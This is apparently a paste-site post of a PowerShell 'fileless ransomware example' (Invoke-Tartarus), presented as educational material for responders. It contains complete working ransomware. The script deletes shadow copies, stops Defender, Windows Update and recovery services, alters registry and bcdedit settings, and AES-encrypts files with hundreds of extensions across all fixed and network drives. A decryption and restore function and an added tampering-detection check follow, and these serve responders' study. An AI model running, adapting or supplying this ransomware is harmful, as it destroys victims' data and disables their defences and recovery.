FlyFar

Invoke-Tartarus.ps1 - Fileless Ransomware Example

Dec 24th, 2023 (edited)
set-strictMode -version 2.0

function Invoke-Tartarus
{
<#

.DISCLAIMER

Warning! Use at your own risk! This script is an example of an actual threat and was created to help responders understand it.

Any action and/or activities related to the material contained within this blog are solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges are brought against any individuals misusing the information in this website to break the law.

This script is published for educational use only. I am in no way responsible for any misuse of the information.

.SYNOPSIS

Fileless "Ransomware" example.

Author: @pabraeken

License: BSD 3-Clause

.DESCRIPTION

Tartarus is expected to be launched from an Empire agent and therefore from memory. It uses symmetric encryption and the key is stored only in memory. This kind of attack is extremely challenging because it bypasses traditional malware detection by running directly in memory. The ransomware can be configured to run for a specific execution time, after which it kills itself.

.PARAMETER MaxExecutionTime

The number of seconds the malware runs before it kills itself.

.PARAMETER IV

Initialization vector (Base64).

.PARAMETER Key

The encryption key (Base64).

.EXAMPLE
> Invoke-Tartarus -MaxExecutionTime 3600 -IV 'RvQUR/CILm1UiQN/u+BABA==' -Key 'lvk3AlqoxLFbKjHXTuHs500WEM7Y+6zAX1Y/F7kD+5U='
Executes the malware for 3600 seconds, then the malware kills itself.

#>
Param(
    [Parameter(Position = 0)]
    [int]
    $MaxExecutionTime=300,

    [Parameter(ParameterSetName = "IV", Position = 1)]
    [String]
    $IV,

    [Parameter(ParameterSetName = "IV", Position = 2)]
    [String]
    $Key
)
    $stopWatch = [system.diagnostics.stopwatch]::StartNew()

    # Manage to delete all snapshots on the target machine and disable the related Windows service
    # Remove all snapshots
    gwmi Win32_Shadowcopy|%{if($($_.ClientAccessible) -eq "True"){$_.Delete()}};
    # Stop the Volume Snapshot Service
    spsv vss -ErrorAction SilentlyContinue;
    # Disable the Volume Snapshot Service
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='vss'").StartMode) -ne "Disabled"){
    set-service vss -StartupType Disabled};

    # Disable recovery options
    # Disable Startup Repair from trying to start when a problem is detected
    bcdedit /set recoveryenabled No|Out-Null;
    # Disable Windows recovery at startup
    bcdedit /set bootstatuspolicy ignoreallfailures|Out-Null;

    # Stop and disable the services Wscsvc - WinDefend - Wuauserv - BITS - ERSvc - WerSvc
    spsv Wscsvc -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='Wscsvc'").StartMode) -ne "Disabled"){
    set-service Wscsvc -StartupType Disabled};
    spsv WinDefend -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='WinDefend'").StartMode) -ne "Disabled"){
    set-service WinDefend -StartupType Disabled};
    spsv Wuauserv -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='Wuauserv'").StartMode) -ne "Disabled"){
    set-service Wuauserv -StartupType Disabled};
    spsv BITS -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='BITS'").StartMode) -ne "Disabled"){
    set-service BITS -StartupType Disabled};
    spsv ERSvc -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='ERSvc'").StartMode) -ne "Disabled"){
    set-service ERSvc -StartupType Disabled};
    spsv WerSvc -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='WerSvc'").StartMode) -ne "Disabled"){
    set-service WerSvc -StartupType Disabled};

    $hklm=2147483650;$hkcu = 2147483649;
    $reg=[WMIClass]"ROOT\DEFAULT:StdRegProv";
    # Disable the security center notifications
    $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}";
    $reg.DeleteKey($hklm, $key)|out-null;
    # Disable the system restore
    $key="SOFTWARE\Microsoft\Windows\CurrentVersion\SystemRestore";
    $reg.CreateKey($hklm, $key)|out-null;
    $reg.SetDWORDValue($hklm, $key, "DisableSR", "1")|out-null;
    # To hide Windows Defender notification icon
    $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
    $reg.DeleteValue($hklm, $key, "WindowsDefender")|out-null;
    $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run";
    $reg.DeleteValue($hklm, $key, "WindowsDefender")|out-null;
    $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
    $reg.DeleteValue($hkcu, $key, "Windows Defender")|out-null;
    $key="SOFTWARE\Policies\Microsoft\Windows Defender";
    $reg.SetDWORDValue($hklm, $key, "DisableAntiSpyware", "1")|out-null;

    $aesManaged=new-object "System.Security.Cryptography.AesManaged";
    $aesManaged.Mode=[System.Security.Cryptography.CipherMode]::CBC;
    $aesManaged.Padding=[System.Security.Cryptography.PaddingMode]::Zeros;
    $aesManaged.BlockSize=128;
    $aesManaged.KeySize=256;
    $aesManaged.IV=[System.Convert]::FromBase64String($IV);
    $aesManaged.Key=[System.Convert]::FromBase64String($Key);
    $encryptor=$aesManaged.CreateEncryptor();
    $drives=gwmi Win32_LogicalDisk -Filter "DriveType=3 or DriveType=4"|select Name;
    foreach($drive in $drives){
        $files=gci "$($drive.Name)" -Recurse -Include *.contact,*.dbx,*.doc,*.docx,*.jnt,*.jpg,*.mapimail,*.msg,*.oab,*.ods,*.pdf,*.pps,*.ppsm,*.ppt,*.pptm,*.prf,*.pst,*.rar,*.rtf,*.txt,*.wab,*.xls,*.xlsx,*.xml,*.zip,*.1cd,*.3ds,*.3g2,*.3gp,*.7z,*.7zip,*.accdb,*.aoi,*.asf,*.asp,*.aspx,*.asx,*.avi,*.bak,*.cer,*.cfg,*.class,*.config,*.css,*.csv,*.db,*.dds,*.dwg,*.dxf,*.flf,*.flv,*.html,*.idx,*.js,*.key,*.kwm,*.laccdb,*.ldf,*.lit,*.m3u,*.mbx,*.md,*.mdf,*.mid,*.mlb,*.mov,*.mp3,*.mp4,*.mpg,*.obj,*.odt,*.pages,*.php,*.psd,*.pwm,*.rm,*.safe,*.sav,*.save,*.sql,*.srt,*.swf,*.thm,*.vob,*.wav,*.wma,*.wmv,*.xlsb,*.3dm,*.aac,*.ai,*.arw,*.c,*.cdr,*.cls,*.cpi,*.cpp,*.cs,*.db3,*.docm,*.dot,*.dotm,*.dotx,*.drw,*.dxb,*.eps,*.fla,*.flac,*.fxg,*.java,*.m,*.m4v,*.max,*.mdb,*.pcd,*.pct,*.pl,*.potm,*.potx,*.ppam,*.ppsm,*.ppsx,*.pptm,*.ps,*.pspimage,*.r3d,*.rw2,*.sldm,*.sldx,*.svg,*.tga,*.wps,*.xla,*.xlam,*.xlm,*.xlr,*.xlsm,*.xlt,*.xltm,*.xltx,*.xlw,*.act,*.adp,*.al,*.bkp,*.blend,*.cdf,*.cdx,*.cgm,*.cr2,*.crt,*.dac,*.dbf,*.dcr,*.ddd,*.design,*.dtd,*.fdb,*.fff,*.fpx,*.h,*.iif,*.indd,*.jpeg,*.mos,*.nd,*.nsd,*.nsf,*.nsg,*.nsh,*.odc,*.odp,*.oil,*.pas,*.pat,*.pef,*.pfx,*.ptx,*.qbb,*.qbm,*.sas7bdat,*.say,*.st4,*.st6,*.stc,*.sxc,*.sxw,*.tlg,*.wad,*.xlk,*.aiff,*.bin,*.bmp,*.cmt,*.dat,*.dit,*.edb,*.flvv,*.gif,*.groups,*.hdd,*.hpp,*.log,*.m2ts,*.m4p,*.mkv,*.mpeg,*.ndf,*.nvram,*.ogg,*.ost,*.pab,*.pdb,*.pif,*.png,*.qed,*.qcow,*.qcow2,*.rvt,*.st7,*.stm,*.vbox,*.vdi,*.vhd,*.vhdx,*.vmdk,*.vmsd,*.vmx,*.vmxf,*.3fr,*.3pr,*.ab4,*.accde,*.accdr,*.accdt,*.ach,*.acr,*.adb,*.ads,*.agdl,*.ait,*.apj,*.asm,*.awg,*.back,*.backup,*.backupdb,*.bank,*.bay,*.bdb,*.bgt,*.bik,*.bpw,*.cdr3,*.cdr4,*.cdr5,*.cdr6,*.cdrw,*.ce1,*.ce2,*.cib,*.craw,*.crw,*.csh,*.csl,*.db_journal,*.dc2,*.dcs,*.ddoc,*.ddrw,*.der,*.des,*.dgc,*.djvu,*.dng,*.drf,*.dxg,*.eml,*.erbsql,*.erf,*.exf,*.ffd,*.fh,*.fhd,*.gray,*.grey,*.gry,*.hbk,*.ibank,*.ibd,*.ibz,*.iiq,*.incpas,*.jpe,*.kc2,*.kdbx,*.kdc,*.kpdx,*.lua,*.mdc,*.mef,*.mfw,*.mmw,*.mny,*.moneywell,*.mrw,*.myd,*.ndd,*.nef,*.nk2,*.nop,*.nrw,*.ns2,*.ns3,*.ns4,*.nwb,*.nx2,*.nxl,*.nyf,*.odb,*.odf,*.odg,*.odm,*.orf,*.otg,*.oth,*.otp,*.ots,*.ott,*.p12,*.p7b,*.p7c,*.pdd,*.pem,*.plus_muhd,*.plc,*.pot,*.pptx,*.psafe3,*.py,*.qba,*.qbr,*.qbw,*.qbx,*.qby,*.raf,*.rat,*.raw,*.rdb,*.rwl,*.rwz,*.s3db,*.sd0,*.sda,*.sdf,*.sqlite,*.sqlite3,*.sqlitedb,*.sr2,*.srf,*.srw,*.st5,*.st8,*.std,*.sti,*.stw,*.stx,*.sxd,*.sxg,*.sxi,*.sxm,*.tex,*.wallet,*.wb2,*.wpd,*.x11,*.x3f,*.xis,*.ycbcra,*.yuv;
        foreach($file in $files) {
            $bytes=[System.IO.File]::ReadAllBytes($($file.FullName));
            $encryptedData=$encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
            # Output file layout: the 16-byte IV followed by the CBC ciphertext
            [byte[]] $fullData=$aesManaged.IV + $encryptedData;
            [System.IO.File]::WriteAllBytes($($file.FullName),$fullData)
            if($stopWatch.Elapsed.TotalSeconds -ge $MaxExecutionTime){
                $aesManaged.Dispose()
                Stop-Process -Id $Pid -Force
            }
        }
    };
    $aesManaged.Dispose()
    Stop-Process -Id $Pid -Force
}

function Create-AesManagedObject() {
<#
.SYNOPSIS

Create an AES Managed Object

Author: @pabraeken

License: BSD 3-Clause
#>
    $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize = 256

    $aesManaged
}
function Create-AesKey() {
<#
.SYNOPSIS

Create an AES Key Object

Author: @pabraeken

License: BSD 3-Clause

.Example
$key = Create-AesKey
$key.IV
$key.Key

Output:
bYsk6zmJmWtt8pZFC9wVuw==
eZpMGPKSeOkhbm1qexalV5rFjKB7MF7MUIu/sbrZEN8=
#>
    $aesManaged = Create-AesManagedObject
    $aesManaged.GenerateKey()
    # AesManaged generates a random IV on first access to .IV
    $aesObject = New-Object PSObject
    $IV =  [System.Convert]::ToBase64String($aesManaged.IV)
    Add-Member -InputObject $aesObject -MemberType NoteProperty -Name "IV" -Value $IV
    $key = [System.Convert]::ToBase64String($aesManaged.Key)
    Add-Member -InputObject $aesObject -MemberType NoteProperty -Name "Key" -Value $key
    $aesObject
}

function Invoke-AntiTartarus
{
<#
.SYNOPSIS

Recover from the attack.

Author: @pabraeken

License: BSD 3-Clause

.DESCRIPTION

Decrypts the files encrypted by Invoke-Tartarus (each file is the 16-byte IV followed by the AES-CBC ciphertext) and reverts the service, boot-configuration and registry changes it made. Because Invoke-Tartarus uses zero padding, decrypted files may keep trailing NUL bytes.

.PARAMETER IV

Initialization vector (Base64), as passed to Invoke-Tartarus.

.PARAMETER Key

The encryption key (Base64), as passed to Invoke-Tartarus.

.EXAMPLE
> Invoke-AntiTartarus -IV 'RvQUR/CILm1UiQN/u+BABA==' -Key 'lvk3AlqoxLFbKjHXTuHs500WEM7Y+6zAX1Y/F7kD+5U='

#>
Param(
    [Parameter(ParameterSetName = "IV", Position = 0)]
    [String]
    $IV,

    [Parameter(ParameterSetName = "IV", Position = 1)]
    [String]
    $Key
)
    $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
    $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize = 256
    # Use the IV and key given as parameters (the original body ignored them and hard-coded the example values)
    $aesManaged.IV = [System.Convert]::FromBase64String($IV)
    $aesManaged.Key = [System.Convert]::FromBase64String($Key)
    $decryptor = $aesManaged.CreateDecryptor();
    $drives = Get-WmiObject Win32_LogicalDisk -Filter "DriveType=3 or DriveType=4" | Select Name
    foreach($drive in $drives){
        $files = get-childitem "$($drive.Name)" -Recurse -Include *.contact,*.dbx,*.doc,*.docx,*.jnt,*.jpg,*.mapimail,*.msg,*.oab,*.ods,*.pdf,*.pps,*.ppsm,*.ppt,*.pptm,*.prf,*.pst,*.rar,*.rtf,*.txt,*.wab,*.xls,*.xlsx,*.xml,*.zip,*.1cd,*.3ds,*.3g2,*.3gp,*.7z,*.7zip,*.accdb,*.aoi,*.asf,*.asp,*.aspx,*.asx,*.avi,*.bak,*.cer,*.cfg,*.class,*.config,*.css,*.csv,*.db,*.dds,*.dwg,*.dxf,*.flf,*.flv,*.html,*.idx,*.js,*.key,*.kwm,*.laccdb,*.ldf,*.lit,*.m3u,*.mbx,*.md,*.mdf,*.mid,*.mlb,*.mov,*.mp3,*.mp4,*.mpg,*.obj,*.odt,*.pages,*.php,*.psd,*.pwm,*.rm,*.safe,*.sav,*.save,*.sql,*.srt,*.swf,*.thm,*.vob,*.wav,*.wma,*.wmv,*.xlsb,*.3dm,*.aac,*.ai,*.arw,*.c,*.cdr,*.cls,*.cpi,*.cpp,*.cs,*.db3,*.docm,*.dot,*.dotm,*.dotx,*.drw,*.dxb,*.eps,*.fla,*.flac,*.fxg,*.java,*.m,*.m4v,*.max,*.mdb,*.pcd,*.pct,*.pl,*.potm,*.potx,*.ppam,*.ppsm,*.ppsx,*.pptm,*.ps,*.pspimage,*.r3d,*.rw2,*.sldm,*.sldx,*.svg,*.tga,*.wps,*.xla,*.xlam,*.xlm,*.xlr,*.xlsm,*.xlt,*.xltm,*.xltx,*.xlw,*.act,*.adp,*.al,*.bkp,*.blend,*.cdf,*.cdx,*.cgm,*.cr2,*.crt,*.dac,*.dbf,*.dcr,*.ddd,*.design,*.dtd,*.fdb,*.fff,*.fpx,*.h,*.iif,*.indd,*.jpeg,*.mos,*.nd,*.nsd,*.nsf,*.nsg,*.nsh,*.odc,*.odp,*.oil,*.pas,*.pat,*.pef,*.pfx,*.ptx,*.qbb,*.qbm,*.sas7bdat,*.say,*.st4,*.st6,*.stc,*.sxc,*.sxw,*.tlg,*.wad,*.xlk,*.aiff,*.bin,*.bmp,*.cmt,*.dat,*.dit,*.edb,*.flvv,*.gif,*.groups,*.hdd,*.hpp,*.log,*.m2ts,*.m4p,*.mkv,*.mpeg,*.ndf,*.nvram,*.ogg,*.ost,*.pab,*.pdb,*.pif,*.png,*.qed,*.qcow,*.qcow2,*.rvt,*.st7,*.stm,*.vbox,*.vdi,*.vhd,*.vhdx,*.vmdk,*.vmsd,*.vmx,*.vmxf,*.3fr,*.3pr,*.ab4,*.accde,*.accdr,*.accdt,*.ach,*.acr,*.adb,*.ads,*.agdl,*.ait,*.apj,*.asm,*.awg,*.back,*.backup,*.backupdb,*.bank,*.bay,*.bdb,*.bgt,*.bik,*.bpw,*.cdr3,*.cdr4,*.cdr5,*.cdr6,*.cdrw,*.ce1,*.ce2,*.cib,*.craw,*.crw,*.csh,*.csl,*.db_journal,*.dc2,*.dcs,*.ddoc,*.ddrw,*.der,*.des,*.dgc,*.djvu,*.dng,*.drf,*.dxg,*.eml,*.erbsql,*.erf,*.exf,*.ffd,*.fh,*.fhd,*.gray,*.grey,*.gry,*.hbk,*.ibank,*.ibd,*.ibz,*.iiq,*.incpas,*.jpe,*.kc2,*.kdbx,*.kdc,*.kpdx,*.lua,*.mdc,*.mef,*.mfw,*.mmw,*.mny,*.moneywell,*.mrw,*.myd,*.ndd,*.nef,*.nk2,*.nop,*.nrw,*.ns2,*.ns3,*.ns4,*.nwb,*.nx2,*.nxl,*.nyf,*.odb,*.odf,*.odg,*.odm,*.orf,*.otg,*.oth,*.otp,*.ots,*.ott,*.p12,*.p7b,*.p7c,*.pdd,*.pem,*.plus_muhd,*.plc,*.pot,*.pptx,*.psafe3,*.py,*.qba,*.qbr,*.qbw,*.qbx,*.qby,*.raf,*.rat,*.raw,*.rdb,*.rwl,*.rwz,*.s3db,*.sd0,*.sda,*.sdf,*.sqlite,*.sqlite3,*.sqlitedb,*.sr2,*.srf,*.srw,*.st5,*.st8,*.std,*.sti,*.stw,*.stx,*.sxd,*.sxg,*.sxi,*.sxm,*.tex,*.wallet,*.wb2,*.wpd,*.x11,*.x3f,*.xis,*.ycbcra,*.yuv
        foreach($file in $files) {
            $fileToDecrypt = $file.FullName
            $bytes = [System.IO.File]::ReadAllBytes($fileToDecrypt)
            # The first 16 bytes are the IV written by Invoke-Tartarus; the ciphertext starts at offset 16.
            # Zero padding is not removed by the decryptor, so trailing NUL bytes may remain in the output.
            $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
            [System.IO.File]::WriteAllBytes($fileToDecrypt,$unencryptedData)
        }
    }
    $aesManaged.Dispose()

    # Restore Windows Services
    Set-Service vss -StartupType Manual
    Set-Service Wscsvc -StartupType Automatic
    Set-Service WinDefend -StartupType Automatic
    Set-Service Wuauserv -StartupType Automatic
    Set-Service BITS -StartupType Automatic
    Set-Service ERSvc -StartupType Automatic
    Set-Service WerSvc -StartupType Automatic

    # Restore recovery options
    # Enable Startup Repair
    bcdedit /set recoveryenabled Yes|Out-Null;
    # Enable Windows recovery at startup
    bcdedit /set bootstatuspolicy DisplayAllFailures|Out-Null;

    $hklm=2147483650;$hkcu = 2147483649;
    $reg=[WMIClass]"ROOT\DEFAULT:StdRegProv";
    # Restore the security center notifications
    $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}";
    $reg.CreateKey($hklm, $key)|out-null;
    # Enable the system restore: remove the DisableSR value rather than writing an empty DWORD,
    # which SetDWORDValue cannot accept
    $key="SOFTWARE\Microsoft\Windows\CurrentVersion\SystemRestore";
    $reg.DeleteValue($hklm, $key, "DisableSR")|out-null;

    # Remove the Defender policy value so the default (enabled) applies again
    $key="SOFTWARE\Policies\Microsoft\Windows Defender";
    $reg.DeleteValue($hklm, $key, "DisableAntiSpyware")|out-null;

    $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Run";
    $reg.SetExpandedStringValue($hklm, $key, "WindowsDefender", "%ProgramFiles%\Windows Defender\MSASCuiL.exe")|out-null;
    $key="SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run";
    $stRestore = ([byte[]](0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
    $reg.SetBinaryValue($hklm, $key, "WindowsDefender", $stRestore)|out-null;
}
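A responder's triage check, added here as an example and not part of the original script: it reads back the service, registry, boot-configuration and shadow-copy state that Invoke-Tartarus changes before it starts encrypting, so the tampering can be spotted (and Invoke-AntiTartarus run) on a suspect host. It assumes an elevated session and English bcdedit output; the function name Test-TartarusTampering is my own.

```powershell
# Added example, not from the original script: read-only check for the host changes
# Invoke-Tartarus makes. Assumes an elevated PowerShell session and English bcdedit output.
function Test-TartarusTampering {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Services the script stops and sets to Disabled (vss first, then the security/update ones)
    foreach ($svc in 'vss','Wscsvc','WinDefend','Wuauserv','BITS','ERSvc','WerSvc') {
        $s = Get-CimInstance Win32_Service -Filter "Name='$svc'" -ErrorAction SilentlyContinue
        if ($s -and $s.StartMode -eq 'Disabled') {
            $findings.Add("service $svc is Disabled (state: $($s.State))")
        }
    }

    # 2. Registry values the script writes, and the key it deletes
    $sr = Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\SystemRestore' -ErrorAction SilentlyContinue
    if ($sr -and $sr.DisableSR -eq 1) { $findings.Add('System Restore disabled (DisableSR=1)') }

    $wd = Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -ErrorAction SilentlyContinue
    if ($wd -and $wd.DisableAntiSpyware -eq 1) { $findings.Add('Defender disabled by policy (DisableAntiSpyware=1)') }

    $sso = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}'
    if (-not (Test-Path -LiteralPath $sso)) { $findings.Add('Security Center ShellServiceObject key is missing') }

    # 3. Boot configuration: Startup Repair off and all boot failures ignored
    $bcd = (& bcdedit /enum '{current}' 2>$null) -join "`n"
    if ($bcd -match '(?im)^\s*recoveryenabled\s+No\b') { $findings.Add('bcdedit recoveryenabled=No') }
    if ($bcd -match '(?im)^\s*bootstatuspolicy\s+IgnoreAllFailures\b') { $findings.Add('bcdedit bootstatuspolicy=IgnoreAllFailures') }

    # 4. Having no shadow copies at all is a weak signal on its own; report it only with other findings
    $shadowCount = @(Get-CimInstance Win32_ShadowCopy -ErrorAction SilentlyContinue).Count
    if ($shadowCount -eq 0 -and $findings.Count -gt 0) { $findings.Add('no Volume Shadow Copies present') }

    return $findings
}

$result = Test-TartarusTampering
if ($result.Count -eq 0) { 'No Tartarus-style tampering found.' }
else { 'Tampering indicators:'; $result | ForEach-Object { " - $_" } }
```

Each finding maps to one line of Invoke-Tartarus, so a non-empty result also tells you which of the Invoke-AntiTartarus restore steps still need to run.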